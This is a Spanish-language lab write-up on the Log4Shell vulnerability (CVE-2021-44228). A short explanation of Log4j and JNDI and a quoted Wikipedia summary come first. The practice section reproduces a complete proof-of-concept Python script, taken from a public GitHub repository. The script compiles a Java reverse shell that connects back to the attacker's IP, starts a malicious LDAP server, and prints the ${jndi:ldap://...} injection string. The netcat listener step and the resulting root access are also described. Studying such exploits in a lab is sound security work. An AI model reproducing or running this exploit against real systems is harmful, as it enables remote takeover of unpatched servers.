
![x](imagenes/log4shell.png "x")

# Indice de contenido
1. [Teoria](#teoria)
    + [Explicacion reverse shell](#expli)
    + [Explicacion extraido de una pagina web oficial](#expli2)
2. [Practica](#practica)
    + [Guia seguida](#guia)
        + [Primera parte](#primera)
        + [Empezando ataque](#ataque)
        + [Resolucion Final](#final)

## Teoria <a name="teoria"></a>
<br/>

* ¿Que es un ataque de log4shell? <a name="expli"></a>
Log4j es una librería de código abierto creada por apache. Miles de desarrollos integran esta herramienta para monitorizar si actividad. La información obtenida en los registros que genera log4shell puede emplearse para encontrar errores en el programa que estás analizando. Esta vulnerabilidad podía permitir a un atacante ejecutar código en un equipo ajeno de forma remota. El principal problema y que convierte esta vulnerabilidad en una de las peores de los últimos tiempos es debido a que la librería log4j és muy usada. Esta vulnerabilidad afecta desde tu propio router de casa hasta la aplicación para acceder el correo electrónico.


* ¿Que es JNDI?
JNDI (Java Naming and Directory Interface) es una interfaz de programación de aplicaciones (API) que proporciona acceso a servicios de nombres y directorios para referenciar objetos y datos que pueden ser integrados dentro de la infraestructura de software. Al tratarse de una capa abstracción, permite dar soporte a multitud de protocolos como LDAP, RMI, CORBA, etc. A continuación, se muestra un modelo de integración de JNDI sobre distintos tipos de servicios.

* Explicacion extraida de [Wikipedia](https://en.wikipedia.org/wiki/Log4Shell). <a name="expli2"></a>
>Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021; it was publicly disclosed on 9 December 2021. Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit is simple to execute and is estimated to affect hundreds of millions of devices.
>
>The vulnerability takes advantage of Log4j's allowing requests to arbitrary LDAP and JNDI servers, allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. A list of its affected software projects has been published by the Apache Security Team. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ and many others. According to Wiz and EY, the vulnerability affected 93% of enterprise cloud environments.
>
>The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever", Ars Technica called it "arguably the most severe vulnerability ever" and The Washington Post said that descriptions by security professionals "border on the apocalyptic".
>
## Medidas de protección:
* No utilizar las versiones anteriores de log4j y intentar actualizar todos los servidores que contengan las versiones anteriores.
## Practica <a name="practica"></a>

* [Guia](https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/) seguida para poder realizar el ataque. <a name="guia"></a> 

* En este test utilizamos un kali vmm que es el atacante, un ubuntu vm que es la maquina atacada. 

* Primero creamos el docker con la aplicación vulnerable: <a name="Primera"></a>

![build](imagenes/build.png "build")
![run](imagenes/run.png "run")
![demos](imagenes/demos.png "demos")

* Una vez tenemos la aplicación vulnerable, podemos empezar el ataque: <a name="ataque"></a>

* Necesitamos una version de java especifica (jdk-8u202) para que funcione, despues tendremos que editar el ejecutable python para poder abrir el ldap malo en local:
```
#!/usr/bin/env python3

import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler

CUR_FOLDER = Path(__file__).parent.resolve()


def generate_payload(userip: str, lport: int) -> None:
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="/bin/sh";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),
            pe=p.getErrorStream(),
            si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();
        s.close();
    }
}
""" % (userip, lport)

    # writing the exploit to Exploit.java file

    p = Path("Exploit.java")

    try:
        p.write_text(program)
        subprocess.run([os.path.join("/usr/bin/jdk1.8.0_202/bin/javac"), str(p)])
    except OSError as e:
        print(Fore.RED + f'[-] Something went wrong {e}')
        raise e
    else:
        print(Fore.GREEN + '[+] Exploit java class created success')


def payload(userip: str, webport: int, lport: int) -> None:
    generate_payload(userip, lport)

    print(Fore.GREEN + '[+] Setting up LDAP server\n')

    # create the LDAP server on new thread
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))
    t1.start()

    # start the web server
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def check_java() -> bool:
    exit_code = subprocess.call([
        '/usr/bin/jdk1.8.0_202/bin/java',
        '-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    return exit_code == 0


def ldap_server(userip: str, lport: int) -> None:
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")

    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run([
        "/usr/bin/jdk1.8.0_202/bin/java",
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])


def main() -> None:
    init(autoreset=True)
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")

    parser = argparse.ArgumentParser(description='log4shell PoC')
    parser.add_argument('--userip',
                        metavar='userip',
                        type=str,
                        default='localhost',
                        help='Enter IP for LDAPRefServer & Shell')
    parser.add_argument('--webport',
                        metavar='webport',
                        type=int,
                        default='8000',
                        help='listener port for HTTP port')
    parser.add_argument('--lport',
                        metavar='lport',
                        type=int,
                        default='9001',
                        help='Netcat Port')

    args = parser.parse_args()

    try:
        if not check_java():
            print(Fore.RED + '[-] Java is not installed inside the repository')
            raise SystemExit(1)
        payload(args.userip, args.webport, args.lport)
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        raise SystemExit(0)


if __name__ == "__main__":
    main()
```

* Abrimos un nc en el puerto 9001 y empezamos el ataque:

![build1](imagenes/nc1.png "nc")

![build2](imagenes/python3.png "python3")

* Vamos al portal de la aplicación vulnerable y introducimos jndi de ldap, una vez introducido podemos ver como el en nc que hemos abierto antes tenemos a acceso a todo como root de el servidor de la aplicación vulnerable: <a name="final"></a>
![build3](imagenes/webbut.png "web")
![build4](imagenes/nc.png "nc2")

* Registros de el ejectuable python:
![build5](imagenes/python.png "python")



